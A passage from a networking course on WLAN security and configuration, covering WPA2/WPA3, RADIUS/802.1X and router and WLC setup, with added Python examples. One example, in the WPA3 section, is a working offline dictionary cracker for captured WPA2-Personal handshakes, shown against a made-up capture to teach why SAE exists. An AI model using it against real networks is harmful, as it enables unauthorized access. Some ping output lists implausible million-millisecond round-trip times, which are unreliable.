method because it is a far stronger cipher. WPA2 uses it in the Counter Mode with Cipher Block Chaining
Message Authentication Code Protocol (CCMP), which encrypts the payload with AES in counter mode and
computes a CBC-MAC over both the encrypted payload and selected unencrypted header fields, so the
receiver can detect whether either has been altered.

In the figure, the administrator is configuring the wireless router to use WPA2 with AES encryption on the 2.4
GHz band.

12.7.7 Authentication in the Enterprise

In networks that have stricter security requirements, an additional authentication or login is required to grant
wireless clients such access. The Enterprise security mode choice requires an Authentication, Authorization,
and Accounting (AAA) RADIUS server.

• RADIUS server IP address - This is the reachable address of the RADIUS server.
• UDP port numbers - The officially assigned ports are UDP 1812 for RADIUS authentication and 1813 for
RADIUS accounting; many servers also accept the legacy ports UDP 1645 and 1646, as shown in the figure.
• Shared key - The shared secret, configured identically on the AP and the RADIUS server, that
authenticates the RADIUS messages exchanged between them.

In the figure, the administrator is configuring the wireless router with WPA2 Enterprise authentication using
AES encryption. The RADIUS server IPv4 address is configured as well with a strong password to be used
between the wireless router and the RADIUS server.

The shared key is not a parameter that must be configured on a wireless client. It is only required on the AP to
authenticate with the RADIUS server. User authentication and authorization is handled by the 802.1X
standard, which provides a centralized, server-based authentication of end users.

The 802.1X login process uses EAP to communicate with the AP and RADIUS server. EAP is a framework for
authenticating network access. It can provide a secure authentication mechanism and, with EAP methods such
as EAP-TLS or PEAP, derive keying material (the Pairwise Master Key) that the AP and client then use to
establish the session keys for TKIP or AES encryption.
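As an added illustration (not code from the course or from any vendor), the following Python builds the RADIUS exchange described above in memory: the AP sends an Access-Request carrying the client's EAP-Response/Identity, and the shared secret is what lets each side authenticate the other, through the Message-Authenticator attribute on the request (RFC 3579) and the Response Authenticator on the reply (RFC 2865). The shared secret, NAS address, user name and packet identifier are constructed values; no packets are sent, so UDP port 1812 is only noted.

```python
import hashlib
import hmac
import os
import struct

ACCESS_REQUEST, ACCESS_CHALLENGE = 1, 11
ATTR_USER_NAME, ATTR_NAS_IP, ATTR_EAP_MESSAGE, ATTR_MESSAGE_AUTH = 1, 4, 79, 80
RADIUS_AUTH_PORT = 1812   # the exchange below is built in memory, nothing is sent


def attr(t, value):
    """RADIUS attribute: Type, Length (including the 2-byte header), Value."""
    return bytes([t, 2 + len(value)]) + value


def find_attr(pkt, t):
    """Offset of the first attribute of type t (attributes start after the 20-byte header), or None."""
    off = 20
    while off + 2 <= len(pkt):
        if pkt[off] == t:
            return off
        if pkt[off + 1] < 2:
            return None
        off += pkt[off + 1]
    return None


def message_authenticator(secret, pkt, authenticator):
    """RFC 3579: HMAC-MD5 keyed with the shared secret over the packet, with the given authenticator in
    the header and the Message-Authenticator value zeroed (for replies the Request Authenticator is used)."""
    off = find_attr(pkt, ATTR_MESSAGE_AUTH)
    zeroed = pkt[:4] + authenticator + pkt[20:off + 2] + bytes(16) + pkt[off + 18:]
    return hmac.new(secret, zeroed, hashlib.md5).digest()


def eap_response_identity(eap_id, identity):
    """EAP-Response/Identity (Code 2, Type 1): the supplicant's first message in 802.1X."""
    return struct.pack(">BBH", 2, eap_id, 5 + len(identity)) + bytes([1]) + identity


def access_request(secret, ident, username, eap_response, nas_ip):
    """NAS (the AP) -> server. EAP rides in EAP-Message, so Message-Authenticator is mandatory."""
    request_auth = os.urandom(16)
    attrs = (attr(ATTR_USER_NAME, username) + attr(ATTR_NAS_IP, nas_ip)
             + attr(ATTR_EAP_MESSAGE, eap_response) + attr(ATTR_MESSAGE_AUTH, bytes(16)))
    pkt = struct.pack(">BBH", ACCESS_REQUEST, ident, 20 + len(attrs)) + request_auth + attrs
    mac = message_authenticator(secret, pkt, request_auth)
    off = find_attr(pkt, ATTR_MESSAGE_AUTH)
    return pkt[:off + 2] + mac + pkt[off + 18:]


def verify_request(secret, pkt):
    """Server side: a NAS that does not hold this secret cannot produce a valid Message-Authenticator."""
    off = find_attr(pkt, ATTR_MESSAGE_AUTH)
    if off is None:
        return False
    expected = message_authenticator(secret, pkt, pkt[4:20])
    return hmac.compare_digest(expected, pkt[off + 2:off + 18])


def access_challenge(secret, request, eap_request):
    """Server -> NAS. Message-Authenticator is computed first (with the Request Authenticator in the
    header), then Response Authenticator = MD5(Code|ID|Length|RequestAuth|Attributes|Secret)."""
    ident, request_auth = request[1], request[4:20]
    attrs = attr(ATTR_EAP_MESSAGE, eap_request) + attr(ATTR_MESSAGE_AUTH, bytes(16))
    head = struct.pack(">BBH", ACCESS_CHALLENGE, ident, 20 + len(attrs))
    draft = head + request_auth + attrs
    mac = message_authenticator(secret, draft, request_auth)
    off = find_attr(draft, ATTR_MESSAGE_AUTH)
    attrs = draft[20:off + 2] + mac + draft[off + 18:]
    response_auth = hashlib.md5(head + request_auth + attrs + secret).digest()
    return head + response_auth + attrs


def verify_response(secret, request, response):
    """NAS side: recompute both authenticators; a spoofed server without the secret fails here."""
    request_auth = request[4:20]
    expected = hashlib.md5(response[:4] + request_auth + response[20:] + secret).digest()
    if not hmac.compare_digest(expected, response[4:20]):
        return False
    off = find_attr(response, ATTR_MESSAGE_AUTH)
    return off is not None and hmac.compare_digest(
        message_authenticator(secret, response, request_auth), response[off + 2:off + 18])


# Constructed sample exchange: shared secret, NAS address, user and identifier are made up.
SHARED_SECRET = b"Str0ngR4diusSecret!"
NAS_IP = bytes([10, 10, 10, 1])
SAMPLE_REQUEST = access_request(SHARED_SECRET, 7, b"alice", eap_response_identity(1, b"alice"), NAS_IP)
# EAP-Request, Type 25 (PEAP) with the Start flag: the server opens the TLS tunnel
SAMPLE_CHALLENGE = access_challenge(SHARED_SECRET, SAMPLE_REQUEST, struct.pack(">BBH", 1, 2, 6) + bytes([25, 0x20]))

if __name__ == "__main__":
    print(verify_request(SHARED_SECRET, SAMPLE_REQUEST), verify_response(SHARED_SECRET, SAMPLE_REQUEST, SAMPLE_CHALLENGE))
```

Note that the user never sees this secret: it protects the AP-to-server leg only, while the user's own credentials are carried inside the EAP tunnel. Both authenticators rest on MD5, so the practical defence is a long random secret and, where the server supports it, RADIUS over TLS.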

12.7.8 WPA3

At the time of this writing, devices that support WPA3 authentication were not readily available. However,
WPA2-Personal is exposed to offline dictionary attacks against a captured handshake, so it is no longer
considered adequate wherever a strong passphrase cannot be guaranteed. WPA3, if available, is the
recommended 802.11 authentication method. WPA3 includes four features:

• WPA3-Personal
• WPA3-Enterprise
• Open Networks
• Internet of Things (IoT) Onboarding

WPA3-Personal

In WPA2-Personal, a threat actor can capture the four-way “handshake” between a wireless client and the AP
and then test passphrase guesses against it offline; because the PMK is derived from the passphrase and the
SSID alone, every guess can be checked without ever contacting the AP. WPA3-Personal thwarts this attack by
using Simultaneous Authentication of Equals (SAE), a password-authenticated key exchange specified in IEEE
802.11-2016. The PSK never appears in the exchange, so a captured exchange gives the threat actor nothing
to check guesses against; guessing is limited to live attempts, one per exchange, which the AP can rate-limit.
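To show why the captured handshake is enough, here is an added example, not from the course, that reproduces the WPA2-Personal key derivation in Python (PBKDF2 to the PMK, the 802.11 PRF to the PTK, HMAC-SHA1 MIC over EAPOL-Key message 2) and runs a small offline dictionary attack against a constructed capture. The SSID OfficeNet is this module's example name; the passphrase, MAC addresses, nonces and wordlist are made up. Real tools do exactly this over large wordlists on GPUs; the only cost per guess is one PBKDF2 computation.

```python
import hashlib
import hmac
import struct


def pmk_from_passphrase(passphrase, ssid):
    """WPA/WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    Every input except the passphrase is public, which is what makes offline guessing possible."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key, label, data, nbytes):
    """IEEE 802.11 PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) concatenated for i = 0, 1, ..."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk, aa, spa, anonce, snonce):
    """Pairwise key expansion for CCMP: 48 bytes = KCK(16) | KEK(16) | TK(16)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


# EAPOL-Key frame: 4-byte 802.1X header, then the key descriptor; the MIC field starts at byte 81.
MIC_OFFSET, MIC_LEN = 81, 16


def eapol_key_msg2(snonce, key_data):
    """Handshake message 2 as the client sends it, MIC field still zero. Key Info 0x010A =
    descriptor version 2 (HMAC-SHA1 MIC, AES key wrap) | pairwise | MIC bit."""
    body = bytes([0x02]) + struct.pack(">HHQ", 0x010A, 16, 1)   # descriptor type, key info, key length, replay counter
    body += snonce + bytes(16) + bytes(8) + bytes(8)            # nonce, key IV, RSC, reserved ID
    body += bytes(MIC_LEN) + struct.pack(">H", len(key_data)) + key_data
    return bytes([0x02, 0x03]) + struct.pack(">H", len(body)) + body


def eapol_mic(kck, frame):
    """WPA2 MIC: first 16 bytes of HMAC-SHA1(KCK, frame with the MIC field zeroed)."""
    zeroed = frame[:MIC_OFFSET] + bytes(MIC_LEN) + frame[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def client_msg2(passphrase, ssid, aa, spa, anonce, snonce, key_data):
    """Legitimate client: derive the PTK and stamp the MIC into message 2."""
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    frame = eapol_key_msg2(snonce, key_data)
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + MIC_LEN:]


def crack_psk(wordlist, ssid, aa, spa, anonce, snonce, msg2):
    """Attacker: SSID, both MACs, both nonces and the MIC'd frame were all captured passively;
    each guess is checked locally, never against the AP."""
    observed = msg2[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for candidate in wordlist:
        kck = derive_ptk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), observed):
            return candidate
    return None


# Constructed capture: the SSID is this module's example; passphrase, MACs, nonces and wordlist are made up.
SSID = "OfficeNet"
AA = bytes.fromhex("001122334455")          # AP (authenticator) MAC
SPA = bytes.fromhex("66778899aabb")         # client (supplicant) MAC
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # CCMP/PSK, as a client sends it
CAPTURED_MSG2 = client_msg2("letmein2019", SSID, AA, SPA, ANONCE, SNONCE, RSN_IE)
WORDLIST = ["password", "OfficeNet", "12345678", "letmein2019", "correcthorse"]

if __name__ == "__main__":
    print(crack_psk(WORDLIST, SSID, AA, SPA, ANONCE, SNONCE, CAPTURED_MSG2))   # letmein2019
```

Because every input to the check except the passphrase is transmitted in the clear, the AP is never contacted and cannot rate-limit or log the attempts. SAE removes this property: the PMK is the output of an interactive exchange, so a capture gives the attacker no function to evaluate offline.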

WPA3-Enterprise

WPA3-Enterprise still uses 802.1X/EAP authentication. Its optional 192-bit security mode requires a consistent
192-bit cryptographic suite (AES-256 in GCMP mode, HMAC-SHA-384, and 384-bit elliptic curve key exchange
and signatures) and disallows mixing in weaker ciphers from earlier 802.11 configurations. That mode follows
the Commercial National Security Algorithm (CNSA) Suite, which is commonly used in high security Wi-Fi
networks.

Open Networks

Open networks in WPA2 send user traffic in unauthenticated, clear text. In the WPA3 generation, open or public
Wi-Fi networks still do not authenticate users. However, they use Opportunistic Wireless Encryption (OWE),
certified by the Wi-Fi Alliance as Wi-Fi Enhanced Open, to negotiate a per-client key and encrypt all wireless
traffic. This defeats passive eavesdropping, but because the AP is not authenticated it does not stop an evil
twin AP.

IoT Onboarding

Although WPA2 included Wi-Fi Protected Setup (WPS) to quickly onboard devices without configuring them
first, WPS is vulnerable to a variety of attacks (its PIN method can be brute-forced) and is not recommended.
Furthermore, IoT devices are typically headless, meaning they have no built-in GUI for configuration, and need
an easy way to get connected to the wireless network. The Device Provisioning Protocol (DPP), certified as
Wi-Fi Easy Connect, was designed to address this need. Each headless device has a hardcoded public key,
typically stamped on the outside of the device or its packaging as a Quick Response (QR) code. The network
administrator scans the QR code with a configurator device, which then provisions the new device over the
air. Although not strictly part of the WPA3 standard, DPP is expected to replace WPS over time.

12.7.9 Check Your Understanding – Secure WLANs

12.8 Module Practice and Quiz

12.8.1 What did I learn in this module?

A wireless LAN (WLAN) is a type of wireless network that is commonly used in homes, offices, and campus
environments. Wireless networks are based on IEEE standards and can be classified into four main types:
WPAN, WLAN, WMAN, and WWAN. WLAN technology uses the unlicensed radio spectrum to send and receive
data; other wireless technologies include Bluetooth, WiMAX, cellular broadband, and satellite broadband. The
IEEE 802.11 WLAN standards define how radio frequencies are used for wireless links. WLAN networks operate
in the 2.4 GHz and 5 GHz frequency bands. Standards ensure interoperability between devices that are made
by different manufacturers. Internationally, the three organizations influencing WLAN standards are the ITU-R,
the IEEE, and the Wi-Fi Alliance.

To communicate wirelessly, most devices include integrated wireless NICs that incorporate a radio
transmitter/receiver. The wireless router serves as an access point, a switch, and a router. Wireless clients
use their wireless NIC to discover nearby APs advertising their SSID. Clients then attempt to associate and
authenticate with an AP. After being authenticated, wireless users have access to network resources. APs can
be categorized as either autonomous APs or controller-based APs. There are three types of antennas for
business class APs: omnidirectional, directional, and MIMO.

The 802.11 standard identifies two main wireless topology modes: Ad hoc mode and Infrastructure
mode. Tethering is used to provide quick wireless access. Infrastructure mode defines two topology building
blocks: A Basic Service Set (BSS) and an Extended Service Set (ESS). All 802.11 wireless frames contain the
following fields: frame control, duration, address 1, address 2, address 3, sequence control, address 4,
payload, and FCS. WLANs use CSMA/CA as the method to determine how and when to send data on the
network. Part of the 802.11 process is discovering a WLAN and subsequently connecting to it. Wireless
devices discover a wireless AP, authenticate with it, and then associate with it. Wireless clients connect to the
AP using a scanning process which may be passive or active.

CAPWAP is an IETF standard protocol (RFC 5415) that enables a WLC to manage multiple APs and WLANs. The
CAPWAP split MAC concept takes all of the functions normally performed by individual APs and distributes
them between two functional components: AP MAC functions and WLC MAC functions. DTLS is a protocol
which provides security between the AP and the WLC. FlexConnect is a wireless solution for branch office and
remote office deployments. You configure and control access points in a branch office from the corporate
office through a WAN link, without deploying a controller in each office. There are two modes of operation for
the FlexConnect AP: connected and standalone.

Wireless LAN devices have transmitters and receivers tuned to specific frequencies of radio waves to
communicate. Frequencies are allocated as ranges, which are then split into smaller ranges called channels;
the modulation techniques used on those channels include DSSS, FHSS, and OFDM. The 802.11b/g/n
standards operate in the 2.4 GHz to 2.5 GHz spectrum. The 2.4 GHz band is subdivided into multiple channels.
Each channel is allotted 22 MHz bandwidth and is separated from the next channel by 5 MHz. When planning
the location of APs, the approximate circular coverage area is important.

Wireless networks are susceptible to threats, including: data interception, wireless intruders, DoS attacks, and
rogue APs. Wireless DoS attacks can be the result of: improperly configured devices, a malicious user
intentionally interfering with the wireless communication, and accidental interference. A rogue AP is an AP or
wireless router that has been connected to a corporate network without explicit authorization. When
connected, a threat actor can use the rogue AP to capture MAC addresses, capture data packets, gain access
to network resources, or launch a MITM attack. In a MITM attack, the threat actor is positioned in between two
legitimate entities to read or modify the data that passes between the two parties. A popular wireless MITM
attack is called the “evil twin AP” attack, where a threat actor introduces a rogue AP and configures it with the
same SSID as a legitimate AP. To prevent the installation of rogue APs, organizations must configure WLCs
with rogue AP policies.

To keep wireless intruders out and protect data, two early security features are still available on most routers
and APs: SSID cloaking and MAC address filtering. There are four shared key authentication techniques
available: WEP, WPA, WPA2, and WPA3 (Devices with WPA3 are not yet readily available). Home routers
typically have two choices for authentication: WPA and WPA2. WPA2 is the stronger of the two. Encryption is
used to protect data. The WPA and WPA2 standards use the following encryption protocols: TKIP and AES. In
networks that have stricter security requirements, an additional authentication or login is required to grant
wireless clients access. The Enterprise security mode choice requires an Authentication, Authorization, and
Accounting (AAA) RADIUS server.

12.8.2 Module Quiz – WLAN Concepts

13 WLAN Configuration
13.0.1 Why should I take this module?

Welcome to WLAN Configuration!

Some of us remember getting on the internet using dial up. Dial up involved using your landline phone. Your
landline phone was unavailable to make or receive calls while you were on the internet. Your dial up
connection to the internet was very slow. It basically meant that, for most people, your computer was always in
one place in your home or school.

Then we were able to connect to the internet without using our landlines. But our computers were still
hardwired to the devices that connected them to the internet. Today we can connect to the internet using
wireless devices that let us take our phones, laptops, and tablets almost anywhere. It’s nice to have this
freedom of movement, but it requires special end and intermediary devices and a good understanding of
wireless protocols. Want to know more? Then this is the module for you!

13.0.2 What Will I learn to do in this module?

Module Title: WLAN Configuration

Module Objective: Implement a WLAN using a wireless router and WLC.

Topic Title - Topic Objective

• Remote Site WLAN Configuration - Configure a WLAN to support a remote site.
• Configure a Basic WLAN on the WLC - Configure a WLC WLAN to use the management interface and WPA2
PSK authentication.
• Configure a WPA2 Enterprise WLAN on the WLC - Configure a WLC WLAN to use a VLAN interface, a DHCP
server, and WPA2 Enterprise authentication.
• Troubleshoot WLAN Issues - Troubleshoot common wireless configuration issues.

13.1 Remote Site WLAN Configuration

13.1.1 Video – Configure a Wireless Network

Click Play in the figure to view a demonstration of how to configure a wireless network.

13.1.2 The Wireless Router

Remote workers, small branch offices, and home networks often use a small office and home router. These
routers are sometimes called an integrated router because they typically include a switch for wired clients, a
port for an internet connection (sometimes labeled “WAN”), and wireless components for wireless client
access, as shown for the Cisco Meraki MX64W in the figure. For the rest of this module, small office and
home routers are referred to as wireless routers.

Cisco Meraki MX64W

The next figure shows a topology depicting the physical connection of a wired laptop to the wireless router,
which is then connected to a cable or DSL modem for internet connectivity. It shows a person sitting at a
computer desk; a link runs from the back of the desktop computer to the wireless router, from the wireless
router to the broadband modem, and from the broadband modem to the internet, depicted by a cloud.

These wireless routers typically provide WLAN security, DHCP services, integrated Network Address Translation
(NAT), quality of service (QoS), as well as a variety of other features. The feature set will vary based on the
router model.

Note: Cable or DSL modem configuration is usually done by the service provider’s representative either on-
site or remotely through a walkthrough with you on the phone. If you buy the modem, it will come with
documentation for how to connect it to your service provider which will most likely include contacting your
service provider for more information.

13.1.3 Log in to the Wireless Router

Most wireless routers are ready for service out of the box. They are preconfigured to be connected to the
network and provide services. For example, the wireless router uses DHCP to automatically provide
addressing information to connected devices. However, wireless router default IP addresses, usernames, and
passwords can easily be found on the internet. Just enter the search phrase “default wireless router IP
address” or “default wireless router passwords” to see a listing of many websites that provide this information.
For example, the username and password for the wireless router in the figure are “admin”. Therefore, your first
priority should be to change these defaults for security reasons.

To gain access to the wireless router’s configuration GUI, open a web browser. In the address field, enter the
default IP address for your wireless router. The default IP address can be found in the documentation that
came with the wireless router or you can search the internet. The figure shows the IPv4 address [Link],
which is a common default for many manufacturers. A security window prompts for authorization to access the
router GUI. The word admin is commonly used as the default username and password. Again, check your
wireless router’s documentation or search the internet.

13.1.4 Basic Network Setup

Basic network setup includes the following steps:

1. Log in to the router from a web browser.
2. Change the default administrative password.
3. Log in with the new administrative password.
4. Change the default DHCP IPv4 addresses.
5. Renew the IP address.
6. Log in to the router with the new IP address.

1. Log in to the router from a web browser.

After logging in, a GUI opens. The GUI will have tabs or menus to help you navigate to various router
configuration tasks. It is often necessary to save the settings changed in one window before proceeding to
another window. At this point, it is a best practice to make changes to the default settings.


2. Change the default administrative password.

To change the default login password, find the administration portion of the router’s GUI. In this example, the
Administration tab was selected. This is where the router password can be changed. On some devices, such
as the one in the example, you can only change the password. The username remains admin or whatever the
default username is for the router you are configuring.


3. Log in with the new administrative password.

After you save the new password, the wireless router will request authorization again. Enter the username and
new password, as shown in the example.


4. Change the default DHCP IPv4 addresses.

Change the default router IPv4 address. It is a best practice to use private IPv4 addressing inside your
network. The IPv4 address [Link] is used in the example but it could be any private IPv4 address you
choose.


5. Renew the IP address.

When you click save, you will temporarily lose access to the wireless router. Open a command window and
renew your IP address with the ipconfig /renew command, as shown in the example.


6. Log in to the router with the new IP address.

Enter the router’s new IP address to regain access to the router configuration GUI, as shown in the example.
You are now ready to continue configuring the router for wireless access.

13.1.5 Basic Wireless Setup

Basic wireless setup includes the following steps:

1. View the WLAN defaults.
2. Change the network mode.
3. Configure the SSID.
4. Configure the channel.
5. Configure the security mode.
6. Configure the passphrase.

1. View the WLAN defaults.

Out of the box, a wireless router provides wireless access to devices using a default wireless network name
and password. The network name is called the Service Set Identifier (SSID). Locate the basic wireless
settings for your router to change these defaults, as shown in the example.


2. Change the network mode.

Some wireless routers allow you to select which 802.11 standard to implement. The example shows that
“Legacy” has been selected. This means wireless devices connecting to the wireless router can have a variety
of wireless NICs installed. Today’s wireless routers configured for legacy or mixed mode most likely support
802.11a, 802.11n, and 802.11ac NICs.


3. Configure the SSID.

Assign an SSID to the WLANs. OfficeNet is used in the example for all three WLANs (the third WLAN is not
shown). The wireless router announces its presence by sending broadcasts advertising its SSID. This allows
wireless hosts to automatically discover the name of the wireless network. If the SSID broadcast is disabled,
you must manually enter the SSID on each wireless device that connects to the WLAN.


4. Configure the channel.

Devices configured with the same channel within the 2.4 GHz band may overlap and cause interference,
slowing down wireless performance and potentially breaking network connections. The solution is to configure
non-overlapping channels on the wireless routers and access points that are near each other. Specifically,
channels 1, 6, and 11 are non-overlapping. In the example, the wireless router is configured to use channel 6.


5. Configure the security mode.

Out of the box, a wireless router may have no WLAN security configured. In the example, the personal version
of Wi-Fi Protected Access version 2 (WPA2 Personal) is selected for all three WLANs. Of the modes offered on
this router, WPA2 with Advanced Encryption Standard (AES) encryption is the strongest; select WPA3 instead
where the router and all clients support it, and never choose WEP or TKIP.


6. Configure the passphrase.

WPA2 Personal uses a passphrase to authenticate wireless clients. It is easier to use in a small office or home
environment because it does not require an authentication server. Larger organizations implement WPA2
Enterprise and require wireless clients to authenticate individually, with a username and password or a
certificate, through a RADIUS server.

13.1.6 Configure a Wireless Mesh Network

In a small office or home network, one wireless router may suffice to provide wireless access to all the clients.
However, if you want to extend the range beyond approximately 45 meters indoors and 90 meters outdoors,
you can add wireless access points. As shown in the wireless mesh network in the figure, two access points
are configured with the same WLAN settings from our previous example. Notice that the channels selected
are 1 and 11 so that the access points do not interfere with channel 6 configured previously on the wireless
router.

Extending a WLAN in a small office or home has become increasingly easier. Manufacturers have made
creating a wireless mesh network (WMN) simple through smartphone apps. You buy the system, disperse the
access points, plug them in, download the app, and configure your WMN in a few steps. Search the internet
for “best wi-fi mesh network system” to find reviews of current offerings.

13.1.7 NAT for IPv4

On a wireless router, if you look for a page like the Status page shown in the figure, you will find the IPv4
addressing information that the router uses to send data to the internet. Notice that the IPv4 address
[Link] is on a different network than the [Link] address assigned to the router’s LAN interface. All
the devices on the router’s LAN will be assigned addresses with the 10.10.10 prefix.

The [Link] IPv4 address is publicly routable on the internet. Any address with the 10 in the first octet
is a private IPv4 address and cannot be routed on the internet. Therefore, the router will use a process called
Network Address Translation (NAT) to convert private IPv4 addresses to internet-routable IPv4 addresses.
With NAT, a private (local) source IPv4 address is translated to a public (global) address. The process is
reversed for incoming packets. The router is able to translate many internal IPv4 addresses into public
addresses, by using NAT.

Some ISPs use private addressing to connect to customer devices. However, eventually, your traffic will leave
the provider’s network and be routed on the internet. To see the IP addresses for your devices, search the
internet for “what is my IP address.” Do this for other devices on the same network and you will see that they
all share the same public IPv4 address. NAT overload, also called Port Address Translation (PAT), makes this
possible by rewriting the source port as well as the source address and tracking the port numbers for every
session established by a device. If your ISP has IPv6 enabled, you will see a unique IPv6 address for each
device.

13.1.8 Quality of Service

Many wireless routers have an option for configuring Quality of Service (QoS). By configuring QoS, you can
guarantee that certain traffic types, such as voice and video, are prioritized over traffic that is not as time-
sensitive, such as email and web browsing. On some wireless routers, traffic can also be prioritized on specific
ports.

The figure is a simplified mockup of a QoS interface based on a Netgear GUI. You will usually find the QoS
settings in the advanced menus. If you have a wireless router available, investigate the QoS settings.
Sometimes, these might be listed under “bandwidth control” or something similar. Consult the wireless router’s
documentation or search the internet for “qos settings” for your router’s make and model.

13.1.9 Port Forwarding

Wireless routers typically block unsolicited inbound TCP and UDP connections to prevent unauthorized access
to the LAN. However, there are situations when specific ports must be opened so that certain programs and
applications can communicate with devices on different networks. Port forwarding is a rule-based method of
directing traffic between devices on separate networks.

When traffic reaches the router, the router determines if the traffic should be forwarded to a certain device
based on the port number found with the traffic. For example, a router might be configured to forward port 80,
which is associated with HTTP. When the router receives a packet with the destination port of 80, the router
forwards the traffic to the server inside the network that serves web pages. In the figure, port forwarding is
enabled for port 80 and is associated with the web server at IPv4 address [Link].

Port triggering allows the router to temporarily forward data through inbound ports to a specific device. You
can use port triggering to forward data to a computer only when a designated port range is used to make an
outbound request. For example, a video game might use ports 27000 to 27100 for connecting with other
players. These are the trigger ports. A chat client might use port 56 for connecting the same players so that
they can interact with each other. In this instance, if there is gaming traffic on an outbound port within the
triggered port range, inbound chat traffic on port 56 is forwarded to the computer that is being used to play the
video game and chat with friends. When the game is over and the triggered ports are no longer in use, port 56
is no longer allowed to send traffic of any type to this computer.

13.1.10 Packet Tracer – Configure a Wireless Network

In this activity, you will configure a wireless router and an access point to accept wireless clients and route IP
packets.

13.1.11 Lab – Configure a Wireless Network

In this lab, you will configure basic settings on a wireless router and connect a PC to router wirelessly.

13.2 Configure a Basic WLAN on the WLC

13.2.1 Video – Configure a Basic WLAN on the WLC

In the previous topic you learned about remote site WLAN configuration. This topic is about configuring a
basic WLAN on the WLC.

Click Play in the figure to view a demonstration of configuring a Cisco 3504 WLC with basic WLAN
connectivity.

13.2.2 WLC Topology

The topology and addressing scheme used for the videos and this topic are shown in the figure and the table.
The access point (AP) is a controller-based AP as opposed to an autonomous AP. Recall that controller-based
APs require no initial configuration and are often called lightweight APs (LAPs). LAPs use the Control and
Provisioning of Wireless Access Points (CAPWAP) protocol, the standardized successor of the Lightweight
Access Point Protocol (LWAPP), to communicate with a WLAN controller (WLC). Controller-based APs are
useful in situations where many APs are required in the network. As more APs are added, each AP is
automatically configured and managed by the WLC.

The AP is PoE, which means it is powered over the ethernet cable that is attached to the switch.

Addressing Table

13.2.3 Log in to the WLC

Configuring a wireless LAN controller (WLC) is not that much different from configuring a wireless router. The
big difference is that a WLC controls APs and provides more services and management capabilities, many of
which are beyond the scope of this module.

Note: The figures in this topic that show the graphical user interface (GUI) and menus are from a Cisco 3504
Wireless Controller. However, other WLC models will have similar menus and features.

The figure shows the user logging into the WLC with credentials that were configured during initial setup.

The Network Summary page is a dashboard that provides a quick overview of the number of configured
wireless networks, associated access points (APs), and active clients. You can also see the number of rogue
access points and clients, as shown in the figure.

13.2.4 View AP Information

Click Access Points from the left menu to view an overall picture of the AP’s system information and
performance, as shown in the next figure. The AP is using IP address [Link]. Because Cisco
Discovery Protocol (CDP) is active on this network, the WLC knows that the AP is connected to the
FastEthernet 0/1 port on the switch.

This AP in the topology is a Cisco Aironet 1815i which means you can use the command-line and a limited set
of familiar IOS commands. In the example, the network administrator pinged the default gateway, pinged the
WLC, and verified the wired interface.

AP1# ping [Link]
Sending 5, 100-byte ICMP Echos to [Link], timeout is 2 seconds
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 1069812.242/1071814.785/1073817.215 ms
AP1# ping [Link]
Sending 5, 100-byte ICMP Echos to [Link], timeout is 2 seconds
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 1055820.953/1057820.738/1059819.928 ms
AP1# show interface wired 0
wired0 Link encap:Ethernet HWaddr [Link]
inet addr:[Link] Bcast:[Link] Mask:[Link]
UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
RX packets:2478 errors:0 dropped:3 overruns:0 frame:0
TX packets:1494 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:80
RX bytes:207632 (202.7 KiB) TX bytes:300872 (293.8 KiB)
AP1#

13.2.5 Advanced Settings

Most WLC will come with some basic settings and menus that users can quickly access to implement a variety
of common configurations. However, as a network administrator, you will typically access the advanced
settings. For the Cisco 3504 Wireless Controller, click Advanced in the upper right-hand corner to access the
advanced Summary page, as shown in the figure. From here, you can access all the features of the WLC.

13.2.6 Configure WLAN

Wireless LAN Controllers have ports and interfaces. Ports are the sockets for the physical connections to the
wired network. They resemble switch ports. Interfaces are virtual. They are created in software and are very
similar to VLAN interfaces. In fact, each interface that will carry traffic from a WLAN is configured on the WLC
as a different VLAN. The Cisco 3504 WLC can support 150 access points and 4096 VLANs, however it only
has five physical ports, as shown in the figure. This means that each physical port can support many APs and
WLANs. The ports on the WLC are essentially trunk ports that can carry traffic from multiple VLANs to a
switch for distribution to multiple APs. Each AP can support multiple WLANs.

Basic WLAN configuration on the WLC includes the following steps:

1. Create the WLAN
2. Apply and Enable the WLAN
3. Select the Interface
4. Secure the WLAN
5. Verify the WLAN is Operational
6. Monitor the WLAN
7. View Wireless Client Information

1. Create the WLAN

In the figure, the administrator is creating a new WLAN that will use Wireless_LAN as the name and service
set identifier (SSID). The ID is an arbitrary value that is used to identify the WLAN in display output on the
WLC.

2. Apply and Enable the WLAN

After clicking Apply, the network administrator must enable the WLAN before it can be accessed by users, as
shown in the figure. The Enable checkbox allows the network administrator to configure a variety of features
for the WLAN, as well as additional WLANs, before enabling them for wireless client access. From here, the
network administrator can configure a variety of settings for the WLAN including security, QoS, policies, and
other advanced settings.

3. Select the Interface

When you create a WLAN, you must select the interface that will carry the WLAN traffic. The next figure
shows the selection of an interface that has already been created on the WLC. We will learn how to create
interfaces later in this module.

4. Secure the WLAN

Click the Security tab to access all the available options for securing the LAN. The network administrator
wants to secure Layer 2 with WPA2-PSK. WPA2 and 802.1X are set by default. In the Layer 2 Security drop
down box, verify that WPA+WPA2 is selected (not shown). Click PSK and enter the pre-shared key, as shown
in the figure. Then click Apply. This will enable the WLAN with WPA2-PSK authentication. Wireless clients
that know the pre-shared key can now associate and authenticate with the AP.

